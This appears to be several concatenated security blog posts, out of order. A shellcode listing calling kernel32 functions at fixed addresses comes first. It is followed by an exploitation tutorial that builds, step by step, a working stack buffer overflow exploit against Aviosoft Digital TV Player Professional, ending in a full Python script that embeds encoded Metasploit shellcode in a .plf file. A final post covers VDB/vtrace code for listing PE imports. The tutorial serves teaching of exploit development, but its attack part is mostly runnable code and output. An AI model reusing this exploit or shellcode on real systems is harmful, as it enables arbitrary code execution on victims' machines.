PUSH EAX ; lpDistanceToMoveHigh (0)
PUSH EAX ; lDistanceToMove (0)
PUSH EDX ; hFile
MOV ESI,0x7c811106 ; Call setFilePointer()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call sleep(500) to allow calc to start up and read conf ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
PUSH byte 0x79 ; Sleep 121 ms
MOV ESI, 0x7c802446 ; Load Sleep()
CALL ESI ; Call Sleep()
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;
;; Call writeFile() ;;
;;;;;;;;;;;;;;;;;;;;;;
MOV EAX,ESP ; Push current stack pointer as a "NumberOfBytesWritten" variable
XOR EDX,EDX ; Clear EDX
PUSH EDX ; lpOverlapped == NULL
PUSH EAX ; lpNumberOfBytesWritten == Pointer -> 0
MOV ECX,[ESP+0x1C] ; Move file size into ECX
MOV EDX,[ESP+0x2C] ; Move pointer to file data into EDX
MOV ESI,[ESP+0x58] ; Move file handle into ESI
PUSH ECX ; nNumberOfBytesToWrite
PUSH EDX ; lpBuffer
PUSH ESI ; hFile
MOV ESI,0x7c8112ff ; Call writeFile()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; CloseHandle(fileHandle) ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
MOV EAX,[ESP-0x14] ; Find handle
PUSH EAX ; Push handle onto stack
MOV ESI,0x7c809be7 ; Call CloseHandle()
CALL ESI ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Call ExitProccess(0) ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;
XOR EAX,EAX ; Clear EAX
PUSH EAX ; Push 0x00 (exit(0))
MOV EAX,0x7c81d21b ; Avoid \x0a character
SUB AL, 0x11 ; Add mask
JMP EAX ; JMP - No turning back!
;;;;;;;;;;;;;;;;;;;;;;;;;;
In my next post I'll be actually re-doing this shellcode to make it a metric crap-ton smaller, and more optimized. Now I may even have room to look up the offset for kernel32.dll, and use the hash method to provide a stable shellcode across XP service packs, and even legacy stuff! :-D

If you have any questions, as always feel free to ping me on the twitters/github/whatever. Hope you guys enjoyed!
This will be part 1 of 4-5 articles I'm writing on program exploitation, memory corruption, and shellcode writing.
Yes, this is yet another exploitation primer. I know, I know. Hopefully though I'll be able to show some tricks that aren't mentioned elsewhere that I've learned and used in developing exploits over the past few years.
What I'm going to cover:
- Basic vulnerability discovery
- Stack-based buffer overflows
Enviornment
So to get started we need to do a few things. First of all install Python, it's an awesome language, and you're going to need it.
# Choosing a debugger:
A debugger is vastly important. Without one you have no idea what is going on during execution. Most do pretty much the exact same thing, but some have some features that shine through.
- OllyDbg
- A classic debugger that has been recently updated. I tend to flip-flop between OllyDbg and Immunity depending on what I need to do, and occasionally windbg, but that's only when I really need to. The more recent version does things like DLL and executable analysis for us guessing at arguments and stuff, so we can see them before a function call. That's a huge selling point for me. Also quite customizable for things like CALL highlighting, and JMP pointing.
- Immunity Debugger
- A variation of OllyDbg put out by (you guessed it) Immunity, Inc. Also very good, and has native python support built into it. Created primarilly for exploit development, but uses an older version of OllyDbg as it's base, so no automated analysis of modules :-/.
- WinDbg
- The Windows debugger. Comes with the debugging tools for Microsoft Windows, and is a total pain in the ass to setup, install, and use. Also extremely powerful. I only use it if I really have no choice though because the UI and commands are confusing and pretty poorly thought-out.
Next we need a method to find the addresses of common functions we'll want to use in our shellcode. There are a number of tools that can assist us with this.
- DLLExp
- This is my personal favorite, no-nonsene, search function, and lets you copy the address directly
- VDB
- I've blogged previously on how to locate and extract an executable's IAT to locate functions using VDB, a bit complex, but highly extendable.
- IDA Pro
- Literally costs about a bajillion dollars. Their free version is v5.0 (they're currently on 6.3 I believe)
# Tweak your just-in-time debugger setting in your registry.
Under HKEY_LOCAL_MACHINE(HKLM)\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug change "Debugger" to read something like "C:\dev\ollydbg\ollydbg.exe" -AEDEBUG %ld %ld, and change "Auto" to 1

This will tell windows that if something goes wrong in a program, don't just close it out, fire up our debugger of choice and attach it to the program before passing in the exception.
Discovery
Alright, now that that's done we have a exploit development platform to start with. Let's move on to finding a vulnerable program from Exploit-db, which is an excellent resource for learning.
After searching around for a bit, I wanted to find one that was just a simple, local, non-aslr, non-dep, stack-based buffer overflow.
Our vulnerable piece of software is called Aviosoft Digital TV Player Professional, which already has a Metasploit module written for it. There have also been a number of other exploits written for it, but it's a good place to start since it has a simple method of entry, and it's a classic "blow stuff up and overwrite EIP" type of vulnerability.
Once we have the program installed, we can go ahead and try to blow it up.
Blowing stuff up
I started with this simple python script to try to blow some stuff up and see what happened.
# This bug is triggered with an overly long URL that (after examining the offsets and buffers)
# looks to be a `char string[256]`
# Trigger the bug
start = "http://"
# Pad out our memory buffer
junk = "\x41" * 512
with open('exploit.plf','w') as f:
f.write(start + junk)
After running our script and dragging the newly created exploit.plf onto the Aviosoft shortcut on our desktop (and clicking through the trial dialog), BAM. Buffer exploded.

This actually allows for an interesting side-note about fuzzing. If you re-run the script sticking 2000 "A"s (\x41) into the buffer, it just dies. This is actually because you overwrite a reference to the file itself further down in the stack and never end up triggering the bug in an exploitable way. This is why for Sulley, we take an iterative, block-based fuzzing approach. Basically we first try 64 bytes, then 128, 256, 512, etc. This way we have the most chance of discovering a vulnerability like this!
This also provides some interesting challenges down the line as far as shellcode character and size limitation, but where there's a will, there's a way!
There are a few important things to note here, obviously the biggest being that we overwrote EIP (the execution instruction pointer) with \x41\x41\x41\x41. Secondly is that we spilled our \x41's directly onto the stack (yay), so that means that ESP is pointing to a buffer that we control directly.
Technique
Next we need to talk technique as far as exploitation goes. We have control of EIP, so that's cool. We can make the program execute any instructions we want it to, but what do we actually want it to execute, and how?
The most common tecnhique that absolutely works here is looking for any number of instructions that will allow us to jump EIP onto our controlled buffer, so we can write the next sequence of instructions into it and have it do what we want. For this example I'll be showing 2 different shellcode's that I've written, one that calls MessageBoxA() and one that calls WinExec("calc.exe"), but that comes later.
The next step here is to figure out two things
- Where exactly in our buffer the pointer to ESP points to
- What method do we want to jump to our shellcode
Determining offsets
There is one (cleaver) way to determine the offset of our pointers and buffers. It's to generate a predictable sequence of characters, and use that to blow up your buffer. Thankfully metasploit has a tool for this (pattern_create.rb), and it's used like this.
#(^_^)-(!528)-(rsears@laptop)-(02:24:19)-()
#(~/noscan/metasploit-framework/tools)
./pattern_create.rb 512
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar
This will generate us a 512 byte string that we can stick into our program instead of 512 "A" characters like so:
# This bug is triggered with an overly long URL that (after examining the offsets and buffers)
# looks to be a `char string[256]`
# Trigger the bug
start = "http://"
# Use metasploit's pattern_create to generate our string
junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar"
with open('exploit.plf','w') as f:
f.write(start + junk)
So now after re-running our script, and re-opening Aviosoft, we see this

Now you note that EIP is overwritten with 0x69413469, but since those are stored in little-endian, the string that overwrote it was actually \x69\x34\x41\x69 or "i4Ai". Another thing to notice is where ESP is pointing to has a string that starts with "Aj1A", so those are our two important offsets. Maybe this diagram will help clarify it a bit.

Something to note is that we didn't extend the buffer as far as we could've, for that it takes some expiermentation. As far as our offsets go though, we can either count the number of bytes up to EIP (the dumb way) or use another nice tool from metasploit, pattern_offset.rb.
#(^_^)-(!529)-(rsears@laptop)-(02:25:35)-()
#(~/noscan/metasploit-framework/tools)
./pattern_offset.rb i4Ai
[*] Exact match at offset 253
#(^_^)-(!530)-(rsears@laptop)-(03:14:06)-()
#(~/noscan/metasploit-framework/tools)
./pattern_offset.rb Aj1A
[*] Exact match at offset 273
So now we have our offsets! Horay. Let's double check that though, modify our script to look like this:
# This bug is triggered with an overly long URL that (after examining the offsets and buffers)
# looks to be a `char string[256]`
# Trigger the bug
start = "http://"
# Insert 252 "A"s
junk = "\x41" * 252
# Overwrite EIP with 0x42424242
EIP = "BBBB"
with open('exploit.plf','w') as f:
f.write(start + junk + EIP + junk)
Note: in this case it's necessary to pad both sides of EIP to trigger the bug. That's not always the case, but exploit development is very much guess and check work.

Ut-oh! Looks like our EIP was a byte off (0x41424242), since it's the first byte, that means that we are a single byte short of alignment (little endian strikes again). If we put in \x43 after our EIP instead of just reapeating the junk variable, it would be 0x43424242. Heck, let's do that to distinguish the before and after the EIP while at the same time fixing the alignment. Turns out I just fat-fingered it!
# This bug is triggered with an overly long URL that (after examining the offsets and buffers)
# looks to be a `char string[256]`
# Trigger the bug
start = "http://"
# Insert 253 "A"s
junk = "\x41" * 253
# Insert 255 "C"s
junk2 = "\x43" * 255
# Overwrite EIP with 0x42424242 for real this time
EIP = "BBBB"
with open('exploit.plf','w') as f:
f.write(start + junk + EIP + junk2)
Re-running it things look much better

So let's use the same technique to verify that we have the correct offset for the start of our buffer, shall we? Metasploit claims our offset starts at 273 bytes in, so 253 + 4 (eip) = 257. 273 - 257 = 16. So we have 16 bytes after EIP that we need to pad before our buffer starts.
# This bug is triggered with an overly long URL that (after examining the offsets and buffers)
# looks to be a `char string[256]`
# Trigger the bug
start = "http://"
# Insert 253 "A"s
junk = "\x41" * 253
# Overwrite EIP with 0x42424242 for real this time
EIP = "BBBB"
# Insert 16 "C"s
junk2 = "\x43" * 16
# Insert 128 "D"s
junk3 = "\x44" * 128
with open('exploit.plf','w') as f:
f.write(start + junk + EIP + junk2 + junk3)
And if we re-run yet again...

Awesome opossum! So now that we have the proper buffer and EIP alignments, we can start trying to figure out how to jump to our shellcode. For this task, I option Mona.py from the CoreLan team, but I'll be showing you how to use msfpescan to do the same thing.
What we're doing is looking for a way to jump to the pointer stored in ESP. There are at least 2 different instruction combinations that will lead us here, the first being the obvious JMP ESP, and secondly PUSH ESP; RETN, which will push the pointer of ESP onto the stack, then jump to it. I'll get into those more in the shell-coding section (which may end up being it's own entity).
#(ಠ_ಠ)-(!536)-(rsears@laptop)-(03:50:17)-()
#(~/noscan/metasploit-framework)
./msfpescan -j ESP AviosoftDTV.EXE
[AviosoftDTV.EXE]
...SNIP...
0x0040dc8b jmp esp
0x0040dc8f jmp esp
0x0040dc93 jmp esp
0x0040dc97 jmp esp
0x0040dc9b jmp esp
0x0040dc9f jmp esp
0x0040e04f jmp esp
0x0040e053 jmp esp
0x0040e057 jmp esp
0x0040e05b jmp esp
0x0040e05f jmp esp
0x004127ff push esp; ret
0x00417070 push esp; ret
0x00417e5b jmp esp
0x00417e5f jmp esp
0x004181c3 jmp esp
...SNIP...
A word of caution when selecting memory addresses - We're shoveling these memory addresses and command through a string buffer, so avoid characters that mess with that, namely \x00 which in C is how strings are terminated. You should also avoid \x0a and \x0d, the \r and \n characters, respectively. These will also cause you headaches. Since the executable we use is actually prefixed with a null byte, none of these memory addresses will work! Sad day.
Thankfully the executable isn't the only address space we can reach, if you re-crash the program and go to View -> Executable Modules you can see a list of modules that are loaded, and that we can use JMP ESP opcodes from! For maximum portability I usually tend to avoid system DLLs, as those change from platform to platform, but DLL's that are loaded from the same directory as the exectuable are typically the same across platforms (and therefore the memory addresses stay the same), so you have a universal JMP ESP for that program. How cool is that?
So we know that the main AviosoftDTV.exe is out. Mostly all the other ones that are non-system will work perfectly fine (except for PlayerDLL.dll, as that has a 0x0a in the base address). I ended up using MediaPlayerCtrl.dll for no reason in paticular. Let's see what metasploit has to say about it, shall we?
#(^_^)-(!537)-(rsears@laptop)-(03:51:48)-()
#(~/noscan/metasploit-framework)
./msfpescan -j ESP MediaPlayerCtrl.dll
[MediaPlayerCtrl.dll]
0x6401d1a5 push esp; ret
0x6401d1be push esp; retn 0x0004
0x64032127 push esp; retn 0x6405
0x6403230b push esp; ret
0x64047737 push esp; retn 0x000c
0x640614e3 jmp esp
0x640627a3 jmp esp
A significantly shorter list, but all of these work equally well. I usually option for a straight JMP ESP, but all of these combinations of opcodes will work just fine.
So let's go ahead and insert any of these memory addresses into EIP using the struct.pack to save us from converting to little endian by hand (not hard, just confusing), and insert an INT3 (\xCC) call before our junk3 buffer. We do this because \x44 just happens to be INC ESP, so this won't actually cause the program to barf until it tries to execute a NULL instruction down the line.
# This bug is triggered with an overly long URL that (after examining the offsets and buffers)
# looks to be a `char string[256]`
# Trigger the bug
start = "http://"
# Insert 253 "A"s
junk = "\x41" * 253
# Overwrite EIP
from struct import pack
eip = pack('<L',0x640614e3) # JMP ESP
# Insert 16 "C"s
junk2 = "\x43" * 16
# Interrupt our execution flow
interrupt = "\xcc"
# Insert 128 "D"s
junk3 = "\x44" * 128
with open('exploit.plf','w') as f:
f.write(start + junk + eip + junk2 + interrupt + junk3)

Cool beans! We have successfully transferred control from EIP to our buffer! I have too much to say about shellcoding in this post, so I guess I'll save that for the next one, but let's go ahead and generate some shellcode through metasploit, and pop a calc.exe, shall we?
#(^_^)-(!551)-(rsears@laptop)-(04:17:20)-()
#(~/noscan/metasploit-framework)
./msfpayload windows/exec CMD=calc.exe R | ./msfencode -b '\x00\x0a\x0d' -t c
[*] x86/shikata_ga_nai succeeded with size 227 (iteration=1)
unsigned char buf[] =
"\xbb\x74\xad\x03\x38\xdb\xde\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x33\x83\xe8\xfc\x31\x58\x0e\x03\x2c\xa3\xe1\xcd\x30\x53\x6c"
"\x2d\xc8\xa4\x0f\xa7\x2d\x95\x1d\xd3\x26\x84\x91\x97\x6a\x25"
"\x59\xf5\x9e\xbe\x2f\xd2\x91\x77\x85\x04\x9c\x88\x2b\x89\x72"
"\x4a\x2d\x75\x88\x9f\x8d\x44\x43\xd2\xcc\x81\xb9\x1d\x9c\x5a"
"\xb6\x8c\x31\xee\x8a\x0c\x33\x20\x81\x2d\x4b\x45\x55\xd9\xe1"
"\x44\x85\x72\x7d\x0e\x3d\xf8\xd9\xaf\x3c\x2d\x3a\x93\x77\x5a"
"\x89\x67\x86\x8a\xc3\x88\xb9\xf2\x88\xb6\x76\xff\xd1\xff\xb0"
"\xe0\xa7\x0b\xc3\x9d\xbf\xcf\xbe\x79\x35\xd2\x18\x09\xed\x36"
"\x99\xde\x68\xbc\x95\xab\xff\x9a\xb9\x2a\xd3\x90\xc5\xa7\xd2"
"\x76\x4c\xf3\xf0\x52\x15\xa7\x99\xc3\xf3\x06\xa5\x14\x5b\xf6"
"\x03\x5e\x49\xe3\x32\x3d\x07\xf2\xb7\x3b\x6e\xf4\xc7\x43\xc0"
"\x9d\xf6\xc8\x8f\xda\x06\x1b\xf4\x15\x4d\x06\x5c\xbe\x08\xd2"
"\xdd\xa3\xaa\x08\x21\xda\x28\xb9\xd9\x19\x30\xc8\xdc\x66\xf6"
"\x20\xac\xf7\x93\x46\x03\xf7\xb1\x24\xc2\x6b\x59\x85\x61\x0c"
"\xf8\xd9";
Now we just modify our script to insert the shellcode in the last buffer, and remove our interrupt (you can keep it in if you want to see how the shellcode works). Since there's an alignment problem with the assembly (it'll start an instruction too late), the shellcode won't execute properly unless you NOP slide down to it, so we throw some in for good measure!
# This bug is triggered with an overly long URL that (after examining the offsets and buffers)
# looks to be a `char string[256]`
# Trigger the bug
start = "http://"
# Insert 253 "A"s
junk = "\x41" * 253
# Overwrite EIP
from struct import pack
eip = pack('<L',0x640614e3) # JMP ESP
# Insert 16 "C"s
junk2 = "\x43" * 16
# Insert some NOPs to slide down to our code
nops = "\x90" * 16
shellcode = (
"\xbb\x74\xad\x03\x38\xdb\xde\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x33\x83\xe8\xfc\x31\x58\x0e\x03\x2c\xa3\xe1\xcd\x30\x53\x6c"
"\x2d\xc8\xa4\x0f\xa7\x2d\x95\x1d\xd3\x26\x84\x91\x97\x6a\x25"
"\x59\xf5\x9e\xbe\x2f\xd2\x91\x77\x85\x04\x9c\x88\x2b\x89\x72"
"\x4a\x2d\x75\x88\x9f\x8d\x44\x43\xd2\xcc\x81\xb9\x1d\x9c\x5a"
"\xb6\x8c\x31\xee\x8a\x0c\x33\x20\x81\x2d\x4b\x45\x55\xd9\xe1"
"\x44\x85\x72\x7d\x0e\x3d\xf8\xd9\xaf\x3c\x2d\x3a\x93\x77\x5a"
"\x89\x67\x86\x8a\xc3\x88\xb9\xf2\x88\xb6\x76\xff\xd1\xff\xb0"
"\xe0\xa7\x0b\xc3\x9d\xbf\xcf\xbe\x79\x35\xd2\x18\x09\xed\x36"
"\x99\xde\x68\xbc\x95\xab\xff\x9a\xb9\x2a\xd3\x90\xc5\xa7\xd2"
"\x76\x4c\xf3\xf0\x52\x15\xa7\x99\xc3\xf3\x06\xa5\x14\x5b\xf6"
"\x03\x5e\x49\xe3\x32\x3d\x07\xf2\xb7\x3b\x6e\xf4\xc7\x43\xc0"
"\x9d\xf6\xc8\x8f\xda\x06\x1b\xf4\x15\x4d\x06\x5c\xbe\x08\xd2"
"\xdd\xa3\xaa\x08\x21\xda\x28\xb9\xd9\x19\x30\xc8\xdc\x66\xf6"
"\x20\xac\xf7\x93\x46\x03\xf7\xb1\x24\xc2\x6b\x59\x85\x61\x0c"
"\xf8\xd9"
)
with open('exploit.plf','w') as f:
f.write(start + junk + eip + junk2 + nops + shellcode)
And Voila! We have arbitrary code execution! :)

I'll start this off by saying that Sulley's PyDbg module (while good in it's own way) is not ideal for a multi-platform fuzzing engine like Sulley.
Sure it works for the most part right now, but in order to facilitate fuzzing and crash analysis on *nix platforms right now, you need to use core-dumps. I find this less than ideal, and honestly quite messy.
I was looking for a unified solution to this when @pedramamini recommended I look into @invisig0th's VDB/Vtrace.
Holy Crap
VDB aims to be a unified debugging platform, letting you climb up a layer of abstraction for windows/osx/linux (and talking to @at1as, it looks like there's some preliminary ARM support!), and debug processes the same way. That's exactly what I was looking for.
On to the code (and enough of my ramblings).
# Standard modules
import platform
import sys
import re
# Setup variables
cur_arch = platform.architecture()[0]
vdb_path = "C:\\old_downloads\\vdb_20120806"
run_prog = "C:\\windows\\system32\\calc.exe"
#run_prog = "C:\\Program Files\\7-Zip\\7zFM.exe"
# If we define our vdb path, insert it into sys.path
if vdb_path: sys.path.insert(1,vdb_path)
# Import vtrace and PE
import vtrace
import PE
# Import the current archtype only.
# Only 64-bit python can debug 64 bit apps.
if cur_arch == "32bit":
from envi.archs import i386 as arch
else:
from envi.archs import amd64 as arch
def parsePE(exe = run_prog):
"""
Checks our PE for it's architecture, and
"""
# Parse our PE
pe_parsed = PE.peFromFileName(exe)
# Get our 'Machine' field -> Tells us the architecture it
# was compiled for
pe_arch = pe_parsed.IMAGE_NT_HEADERS.FileHeader.Machine
# If our platform arch != our PE header arch, exit out.
# PE.IMAGE_FILE_MACHINE_I386 == 0x0000014c [ 332 ] == 32 bit
# PE.IMAGE_FILE_MACHINE_AMD64 == 0x00008664 [34404] == 64 bit
if pe_arch == PE.IMAGE_FILE_MACHINE_I386 and cur_arch != "32bit":
print "This won't work! Debugging 32-bit executable in 64-bit python"
sys.exit(1)
elif pe_arch == PE.IMAGE_FILE_MACHINE_AMD64 and cur_arch != "64bit":
print "This won't work! Debugging 64-bit executable in 32-bit python"
sys.exit(1)
return pe_parsed
# Parse out our PE information
p = parsePE()
# Execute our trace and get our base address
trace = vtrace.getTrace()
trace.execute(run_prog)
# Load our library base addresses
libs = trace.getMeta("LibraryBases")
# Find our PE base address
base = libs[re.findall('^.*\\\\(\w+).exe',run_prog.lower())[0]]
# Set up our exports dictionary to hold all the children functions for each DLL
exports = {}
for ord_num, dll_name, func_name in p.getImports():
exports.setdefault(dll_name,[]).append((hex(base+ord_num),func_name))
# Print everything out!
for dll in exports:
print dll.lower()
for export in exports[dll]:
print "\t" + export[0] + " - " + export[1]
Looks daunting, right? That's how a lot of VDB code turns out, you're just doing complicated things with binary files and memory, so it can't really be avoided.
Looking at the first section:
# Standard modules
import platform
import sys
import re
# Setup variables
cur_arch = platform.architecture()[0]
vdb_path = "C:\\old_downloads\\vdb_20120806"
run_prog = "C:\\windows\\system32\\calc.exe"
#run_prog = "C:\\Program Files\\7-Zip\\7zFM.exe"
# If we define our vdb path, insert it into sys.path
if vdb_path: sys.path.insert(1,vdb_path)
# Import vtrace and PE
import vtrace
import PE
# Import the current archtype only.
# Only 64-bit python can debug 64 bit apps.
if cur_arch == "32bit":
from envi.archs import i386 as arch
else:
from envi.archs import amd64 as arch
Here we import some basic modules, set some option variables, and import the rest of the VDB stuff. Not much to say, the code is pretty self-explanatory (and commented).
Let's move onto the second chunk:
def parsePE(exe = run_prog):
"""
Checks our PE for it's architecture, and
"""
# Parse our PE
pe_parsed = PE.peFromFileName(exe)
# Get our 'Machine' field -> Tells us the architecture it
# was compiled for
pe_arch = pe_parsed.IMAGE_NT_HEADERS.FileHeader.Machine
# If our platform arch != our PE header arch, exit out.
# PE.IMAGE_FILE_MACHINE_I386 == 0x0000014c [ 332 ] == 32 bit
# PE.IMAGE_FILE_MACHINE_AMD64 == 0x00008664 [34404] == 64 bit
if pe_arch == PE.IMAGE_FILE_MACHINE_I386 and cur_arch != "32bit":
print "This won't work! Debugging 32-bit executable in 64-bit python"
sys.exit(1)
elif pe_arch == PE.IMAGE_FILE_MACHINE_AMD64 and cur_arch != "64bit":
print "This won't work! Debugging 64-bit executable in 32-bit python"
sys.exit(1)
return pe_parsed
First thing we do is load our executable into a PE class, which parses our a whole bunch of good, juicy information for us.
Remember kids → iPython is always your friend when exploring new pieces of code.
> ipython -i vtrace_ex.py
-- SNIP --
In [1]: p.<TAB>
p.IMAGE_DOS_HEADER p.getMaxRva p.inmem p.readAtRva
p.IMAGE_NT_HEADERS p.getPdataEntries p.parseExports p.readPointerAtOffset
p.checkRva p.getRelocations p.parseImports p.readPointerAtRva
p.fd p.getResourceDef p.parseLoadConfig p.readResource
p.getDataDirectory p.getResources p.parseRelocations p.readRvaFormat
p.getDllName p.getSectionByName p.parseResources p.readStringAtRva
p.getExportName p.getSections p.parseSections p.readStructAtOffset
p.getExports p.getVS_VERSIONINFO p.pe32p p.readStructAtRva
p.getForwarders p.high_bit_mask p.psize p.rvaToOffset
p.getImports p.imports p.readAtOffset p.sections
There are a lot of interesting things here, but what we're focused on here is the IMAGE_NT_HEADERS, which has a few fields, namely Signature, FileHeader, and OptionalHeader. By calling p.IMAGE_NT_HEADERS.tree() we can get a good overview of the information stored there.
Signature section (should always be "PE\x00\x00")
In [3]: print p.IMAGE_NT_HEADERS.tree()<ENTER>
00000000 (248) IMAGE_NT_HEADERS: IMAGE_NT_HEADERS
00000000 (04) Signature: 50450000
FileHeader section
00000004 (20) FileHeader: IMAGE_FILE_HEADER
00000004 (02) Machine: 0x0000014c (332)
00000006 (02) NumberOfSections: 0x00000004 (4)
00000008 (04) TimeDateStamp: 0x4a5bc622 (1247528482)
0000000c (04) PointerToSymbolTable: 0x00000000 (0)
00000010 (04) NumberOfSymbols: 0x00000000 (0)
00000014 (02) SizeOfOptionalHeader: 0x000000e0 (224)
00000016 (02) Ccharacteristics: 0x00000102 (258)
OptionalHeader section
00000018 (224) OptionalHeader: IMAGE_OPTIONAL_HEADER
00000018 (02) Magic: 0b01
0000001a (01) MajorLinkerVersion: 0x00000009 (9)
0000001b (01) MinorLinkerVersion: 0x00000000 (0)
0000001c (04) SizeOfCode: 0x00052e00 (339456)
00000020 (04) SizeOfInitializedData: 0x0006a600 (435712)
00000024 (04) SizeOfUninitializedData: 0x00000000 (0)
00000028 (04) AddressOfEntryPoint: 0x00009768 (38760)
0000002c (04) BaseOfCode: 0x00001000 (4096)
00000030 (04) BaseOfData: 0x00052000 (335872)
00000034 (04) ImageBase: 0x01000000 (16777216)
00000038 (04) SectionAlignment: 0x00001000 (4096)
0000003c (04) FileAlignment: 0x00000200 (512)
00000040 (02) MajorOperatingSystemVersion: 0x00000006 (6)
00000042 (02) MinorOperatingSystemVersion: 0x00000001 (1)
00000044 (02) MajorImageVersion: 0x00000006 (6)
00000046 (02) MinorImageVersion: 0x00000001 (1)
00000048 (02) MajorSubsystemVersion: 0x00000006 (6)
0000004a (02) MinorSubsystemVersion: 0x00000001 (1)
0000004c (04) Win32VersionValue: 0x00000000 (0)
00000050 (04) SizeOfImage: 0x000c0000 (786432)
00000054 (04) SizeOfHeaders: 0x00000400 (1024)
00000058 (04) CheckSum: 0x000cd612 (841234)
0000005c (02) Subsystem: 0x00000002 (2)
0000005e (02) DllCharacteristics: 0x00008140 (33088)
00000060 (04) SizeOfStackReserve: 0x00040000 (262144)
00000064 (04) SizeOfStackCommit: 0x00002000 (8192)
00000068 (04) SizeOfHeapReserve: 0x00100000 (1048576)
0000006c (04) SizeOfHeapCommit: 0x00001000 (4096)
00000070 (04) LoaderFlags: 0x00000000 (0)
00000074 (04) NumberOfRvaAndSizes: 0x00000010 (16)
00000078 (128) DataDirectory: VArray
00000078 (08) 0: IMAGE_DATA_DIRECTORY
00000078 (04) VirtualAddress: 0x00000000 (0)
0000007c (04) Size: 0x00000000 (0)
--SNIP--
So the field we're interested in is the FileHeader → Machine field. This will give us the architecture our executable was compiled to run on, and with pretty much anything in the wonderful world of Windows, it's in a binary format.
Thankfully visi has provided us with some handy reference attributes for the PE module. They're pretty self-explanatory, but just to re-iterate.
PE.IMAGE_FILE_MACHINE_I386 == 0x0000014c [ 332 ] == 32 bit
PE.IMAGE_FILE_MACHINE_AMD64 == 0x00008664 [34404] == 64 bit
Cool beans. Let's move onto the code that actually parses out our executable's IAT.
# Parse out our PE information
p = parsePE()
# Execute our trace and get our base address
trace = vtrace.getTrace()
trace.execute(run_prog)
# Load our library base addresses
libs = trace.getMeta("LibraryBases")
# Find our PE base address
base = libs[re.findall('^.*\\\\(\w+).exe',run_prog.lower())[0]]
# Set up our exports dictionary to hold all the children functions for each DLL
exports = {}
for ord_num, dll_name, func_name in p.getImports():
exports.setdefault(dll_name,[]).append((hex(base+ord_num),func_name))
# Print everything out!
for dll in exports:
print dll.lower()
for export in exports[dll]:
print "\t" + export[0] + " - " + export[1]
When using the vtrace module, you pretty much always follow this convention. You can set breakpoints, or parameters to set breakpoints for you, then you call trace.run(), which is equivalent to a continue in $(your debugger of choice).
The getMeta() function is something that basically allows you to query the state of affairs going on with your trace handler (as far as I understand it). In our case we call it with "LibraryBases" which gives us our library names and their offsets. We could have also called "LibraryPaths", which would've given us a similar data structure with the full path to our libraries, but I chose to write a terrible looking regular expression to just chomp out our executable name to find it's base address.
Now that we have our program's base address though, we basically just need to get a list of the imports from our PE module. Super simple. The exports dictionary is populated with the dll name as the key, and a value array of tuples in the form (calculated address, name) for each function it imports.
It may be simpler to see the data itself, but just know we calculate the offset relative to our executable's base address.
In [36]: exports<ENTER>
--SNIP--
'ntdll.dll': [('0xf7112cL', 'WinSqmAddToStreamEx'),
('0xf71130L', 'WinSqmIncrementDWORD'),
('0xf71134L', 'WinSqmAddToStream'),
('0xf71138L', 'NtQueryLicenseValue'),
('0xf7113cL', 'RtlInitUnicodeString')],
'ole32.dll': [('0xf710f4L', 'CoInitialize'),
('0xf710f8L', 'CoUninitialize'),
('0xf710fcL', 'CoCreateInstance')]}
